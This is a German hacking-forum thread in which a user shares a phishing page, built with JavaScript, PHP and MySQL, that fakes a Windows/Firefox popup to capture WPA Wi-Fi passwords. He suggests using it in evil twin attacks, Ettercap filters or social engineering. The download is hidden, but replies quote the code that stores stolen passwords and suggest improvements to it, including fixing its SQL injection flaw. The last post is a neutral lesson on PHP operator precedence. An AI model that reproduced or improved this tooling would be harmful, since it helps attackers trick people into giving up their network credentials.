3 Antworten in diesem Thema

[m0nk3y]

Hey Freunde,

 

ich hab vorhin ein kleines Projekt von mir gefunden und würde es gerne mit euch teilen.

Möglicherweise kann es irgendwann einmal nützlich werden.

 

Es ist eine kleine Phising Seite für WPA Passwörter; designtechnisch für Firefox && Windows ausgelegt.

 

Popup ist realtiv dynamisch gestaltet; kann verschoben und geschlossen werden (poppt aber wieder auf)

Deswegen fühlt es sich auch ziemlich echt an.

 

Requirements: Javascript  && PHP (&& MySQL) Server

 

Mögliche Einsatzgebiete wären:

- Evil Twin Attacken

- Ettercap Filter

 

Oder man könnte vielleicht sogar mit genug Social Engineering Skills jemanden übers Web dazu bringen, sein WLAN-Passwort zu offenbaren.

 

Vergisst nicht die ESSID entsprechend anzupassen

 

Das ganze ist aus Komfort für MySQL ausgelegt, kann aber leicht auf File I/O umgeschrieben werden.

 

 

 

DOWNLOAD

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

[lNobodyl]

Habe noch ein paar Verbesserungsvorschläge

1. Benutze mysqli() statt mysql(). Das hat den Grund das mysql() veraltet ist und man stattdessen die Erweiterungen MySqli() oder PDO_MYSQL benutzen sollte.

2.

if ($_POST['aa2']!="" AND $_POST['aa3']!="") 

PHP stellt für diesen Fall die Funktion empty() zur Verfügung.

if(!empty($_POST['aa2']) && !empty($_POST['aa3'])){ 
// "&&" ist in der Praxis schneller als "AND"

3. Auf dem ersten Blick scheint die Page SQL-Injection gefährdet zu sein.

$pass = $_POST['aa2'];
[..]
mysql_query("INSERT INTO wpa_logs (wlan_spot, pass) values ('$wlan', '$pass')") or die("Allgemeiner Fehler");

Die Variable $pass wird einfach ungefiltert in den SQL Query eingefügt --> sieht für mich nach einer SQLi aus.

Abhilfe schafft hier das Filtern von dem Input oder prepared statements.

[m0nk3y]

Krieg ja fast schon das Verlangen mein Projekt auf GitHub zu uppen! :>

Danke lNobodyl für die Verbesserung.

 

 

Hier noch meine formale Ausrede:

Der Code ist schon etwas älter und war nur eine schnelle lokale Spontanlösung

[B1nary]

// "&&" ist in der Praxis schneller als "AND"

 

Das hätte ich gerne mal belegt

 

&& und AND oder auch || und OR unterscheiden sich in ihrer Rangfolge, darum gibt es auch beide Schreibweisen!

# 1. Fall
$check = true && false;
echo ($check ? 'true' : 'false'); // false

# 2. Fall
$check = true and false;
echo ($check ? 'true' : 'false'); // true

Beim Fall 1 wird der Variablen das logische Ergebnis aus true && false zugewiesen, was false ist.

Der Fall 2 hingegen ergibt true, weil der boolsche Wert nach dem and ignoriert wird.

 

Wieso? Weil || bzw. && eine höhere Rangfolge gegenüber dem = haben als or bzw. and (or/and haben dementsprechend eine niedrigere Rangfolge als das = )

 

Anders ausgedrückt:

# 1. Fall (das && wird zuerst ausgefuehrt, da es "höher" als das = ist)
$check = true && false;
$check = (true && false);

# 2. Fall (hier wird das = zuerst ausgefuehrt, da es "höher" als das and ist)
$check = true and false;
($check = true) and false;